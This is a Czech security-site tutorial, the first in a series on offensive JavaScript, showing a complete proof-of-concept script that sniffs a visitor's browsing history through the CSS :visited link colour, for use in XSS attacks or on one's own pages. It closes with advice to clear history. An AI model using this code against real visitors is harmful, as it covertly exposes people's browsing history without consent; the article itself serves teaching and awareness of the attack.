Útočný JavaScript (1)
Autor: .cCuMiNn. | 31.1.2011 |
První díl seriálu, ve kterém se budeme střetávat s útočnými kódy z prostředí JavaScriptu. Tentokrát se zaměříme na zjišťování navštívených sránek.
Nový seriál, jehož první díl máte právě před sebou, se bude věnovat konkrétním útočným kódům napsaným v JavaScriptu. Ty najdou využití hlavně při útocích XSS. Možné je ale také jejich vložení do obsahu vlastních WWW stránek, kde mohou o návštívnících podat podrobné informace, mohou využít skrytí za jejich identitu, nebo jen využijí jejich výpočetní výkon.
Samotné skripty nebudou často mým vlastním výtvorem. Vždy ale odkážu na zdroj, ze kterého jsem čerpal, a kde případní zájemci mohou nalézt detailnější informace.
V tomto úvodním dílu se podíváme na způsob, kterým je možné zjistit, zda uživatel navštívil v minulosti konkrétní webové stránky. Kód pochází z knihy XSS Attacks: Cross Site Scripting Exploits and Defense autorů Setha Fogieho, Jeremiaha Grossmana a kol.
Samotný kód je založen na skutečnosti, že webový prohlížeč může obarvovat navštívené a nenavštívené odkazy různou barvou. Když tedy vytvoříme seznam linků, které volžíme na webovou stránku, můžeme podle jejich obarvení zjistit, zda byl daný link v minulosti navštíven nebo ne. Uvedený kód je funkční v prohlížečích Firefox / Mozilla.
- <html>
- <body>
- <H3>Navštívené</H3>
- <ul id="visited"></ul>
- <H3>Nenavštívené</H3>
- <ul id="notvisited"></ul>
- <script>
- /* Seznam linků, které budou prověřeny */
- var websites = [
- "http://www.soom.cz/",
- "http://www.hysteria.sk/",
- "http://www.crypto-world.info/",
- "http://blackhole.sk/",
- "http://www.hoax.cz/",
- "http://www.seznam.cz/",
- "http://www.google.cz/"];
- /* Cyklus pro všechny linky ze seznamu */
- for (var i = 0; i < websites.length; i++) {
- /* Vytvoření odkazu na URI ze seznamu */
- var link = document.createElement("a");
- link.id = "id" + i;
- link.href = websites[i];
- link.innerHTML = websites[i];
- /* Vytvoření vlastního stylu odkazu pro speifický link. Nastaví CSS visited
- selector na známou hodnotu, v tomto případě červenou. */
- document.write('<style>');
- document.write('#id' + i + ":visited {color: #FF0000;}");
- document.write('</style>');
- /* Přidá odkaz do DOM, zjistí jeho barvu a zase jej odebere z DOM */
- document.body.appendChild(link);
- var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");
- document.body.removeChild(link);
- /* Zjištění zda byl odkaz navštíven, zda je jeho barva červená */
- if (color == "rgb(255, 0, 0)") { // navštíven
- /* Přidá odkaz mezi navštívené */
- var item = document.createElement('li');
- item.appendChild(link);
- document.getElementById('visited').appendChild(item);
- } else { // nenavštíven
- /* Přidá odkaz mezi nenavštívené */
- var item = document.createElement('li');
- item.appendChild(link);
- document.getElementById('notvisited').appendChild(item);
- }
- }
- </script>
- </body>
- </html>
Činnost skriptu demonstruje následující rám:
Pokud se nechcete stát obětí podobného útoku, je vhodné pravidelně promazávat historii navštívených stránek. To je možné provést jednak manuálně, ale také automaticky při každém vypnutí webového prohlížeče.
Všechny díly seriálu
Útočný JavaScript (1)Útočný JavaScript (2)
Útočný JavaScript (3)
Útočný JavaScript (4)
Útočný JavaScript (5)
Útočný JavaScript (6)
Útočný JavaScript (7)
Útočný JavaScript (8)
Útočný JavaScript (9)
Útočný JavaScript (10)
Budeme potěšeni, pokud vás zaujme také reklamní nabídka
.Přihlášení | ||
| |||
.Infobox Nejnovější:
Články:
BugTrack: HackForum: Další služby: Na SOOM.cz je:
Článků: 991
Komentářů: 14 249 Aktualit: 1 861 Souborů: 151 WebForum: 49 236 Hardware: 38 Diskuze: 20 069 BugTrack: 4 412 Reg. uživatelů: 15 653 A proběhlo:
Zobraz. článků: 16 919 592
Staženo souborů: 1 342 216 Staženo dat: 862 497 MB Přístupy (hits): 188 950 110 | ||
| ||||
| |||
| |||
| |||
| ||||
| ||||
| ||||
| ||||
| ||||||||||||||||||||||||
